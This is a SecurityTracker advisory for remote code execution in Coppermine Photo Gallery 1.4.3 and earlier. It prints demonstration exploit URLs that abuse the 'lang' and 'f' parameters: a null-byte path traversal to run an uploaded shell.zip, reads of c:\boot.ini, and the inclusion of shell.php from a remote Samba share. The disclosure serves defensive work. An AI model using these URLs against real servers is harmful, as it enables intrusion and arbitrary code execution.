SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Coppermine Photo Gallery Vendors:   DEMAR, Gregory
Coppermine Photo Gallery Include File Bugs in 'include/init.inc.php' and 'docs/showdoc.php' Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015646
SecurityTracker URL:  http://securitytracker.com/id/1015646
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 18 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.4.3 and prior versions
Description:   rgod reported a vulnerability in Coppermine Photo Gallery. A remote user can execute arbitrary code on the target system.

The 'include/init.inc.php' script does not properly validate user-supplied input in the 'lang' parameter. A remote authenticated user can upload a file containing arbitrary code to the target system as part of the image upload feature. The remote user can then supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the file. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided [using an example 'shell.zip' filename]:

http://[target]/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00

The 'docs/showdoc.php' script does not properly validate user-supplied input in the 'f' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the local system or from an accessible Samba server.

Some demonstration exploit URLs are provided:

http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini

http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php

If magic_quotes_gpc is enabled, additional slashes are required:

http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini

http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php

A demonstration exploit is available at:

http://retrogod.altervista.org/cpg_143_incl_xpl.html

The original advisory is available at:

http://retrogod.altervista.org/cpg_143_adv.html

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  coppermine-gallery.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Coppermine Photo Gallery <=1.4.3 remote code execution (advisory & exploit)

http://retrogod.altervista.org/cpg_143_adv.html
http://retrogod.altervista.org/cpg_143_incl_xpl.html

rgod
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC